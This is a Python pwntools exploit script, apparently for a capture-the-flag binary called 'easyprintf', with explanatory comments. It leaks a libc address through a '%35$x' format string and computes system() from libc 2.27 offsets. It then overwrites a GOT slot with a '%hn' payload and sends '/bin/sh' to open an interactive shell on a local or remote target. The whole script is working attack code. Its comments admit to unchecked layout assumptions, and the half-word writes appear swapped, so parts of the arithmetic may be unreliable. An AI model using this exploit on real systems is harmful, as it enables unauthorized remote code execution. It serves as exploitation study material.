# Exploit script against the "easyprintf" binary: leaks one stack value with a
# positional "%N$x" specifier, derives the runtime address of system() from
# symbol offsets of a known libc build, then uses "%hn" writes to overwrite a
# relocation slot in the binary. Every step below relies on the target
# lacking the usual mitigations — a caller-controlled format string handed
# straight to printf, plus a fixed, writable relocation slot. Compiling with
# -Wformat-security / _FORTIFY_SOURCE and linking with Full RELRO and PIE is
# what removes this bug class; none of those properties can be checked from
# this script alone.
from pwn import *
import sys
import time

# 32-bit x86 target: p32() below packs 4-byte little-endian values.
context.arch = 'i386'
if len(sys.argv) < 2:
    # No host/port on the command line: run the binary locally with
    # verbose pwntools logging.
    p = process('./easyprintf')  
    context.log_level = 'debug'
else:  
    # Otherwise talk to HOST PORT given as argv[1] argv[2].
    p = remote(sys.argv[1], int(sys.argv[2]))
   
# Leak step: "%35$x" makes printf print its 35th positional argument as hex.
# The first 8 hex characters of the reply are parsed as an address and 241
# is subtracted; judging by the arithmetic a few lines down, the result is
# treated as the runtime address of __libc_start_main, so the name
# "main_base" is misleading (it is a libc address, not main()'s).
p.writeline("%35$x")
ret = p.recv(2048)
main_base = int(ret[0:8], 16) - 241
# Symbol offsets come from one specific libc build (2.27, i386); the computed
# address is only meaningful if the target process runs that exact library.
libc = ELF('/lib/i386-linux-gnu/libc-2.27.so')
# runtime system() = runtime __libc_start_main + (system - __libc_start_main)
sysaddr = main_base - libc.symbols['__libc_start_main'] + libc.symbols['system']
# readelf -a /lib/i386-linux-gnu/libc-2.27.so |grep "main@"
print("%x" % sysaddr)

# Fixed address of a relocation slot in the target binary (see the
# "readelf -r easyprintf" note below). A constant address like this only
# works for a non-PIE binary; assumed from the name to be printf's GOT entry.
printfaddr = 0x0804c014

log.info('start send')
dest = p32(printfaddr) # readelf -r easyprintf
dest2 = p32(printfaddr + 2)  # address of the slot's upper 16-bit half

# The 4-byte slot is filled as two 16-bit halves with "%hn", which stores the
# number of characters printed so far. The two packed addresses occupy the
# first 8 bytes of output, which is what the -8 / +8 adjustments account for.
low = (sysaddr & 0xffff)-8
high = (sysaddr>>16 & 0xffff)-low+8
print(low, high)

# "%.<N>x" emits N characters to raise the running count; "%8$hn" then writes
# that count to the address found at positional argument 8 (dest2) and
# "%7$hn" to the one at argument 7 (dest). This assumes the format buffer
# lands at positional argument 7 — not verifiable from this script, and
# whether each count reaches the intended half of the slot depends on that
# layout.
payload = dest + dest2 + (b'%%.%dx' % low) + b'%8$hn' + (b'%%.%dx' % high) + b'%7$hn'
print(payload)

p.writeline(payload)
log.info('send over')
sleep(2)  # sleep() is provided by the pwn star-import, not the time module
# Presumably consumed by the next call that goes through the overwritten
# slot; nothing here confirms what the target does with this line.
payload = '/bin/sh'
p.writeline(payload)

log.info('get shell!!')  
p.interactive()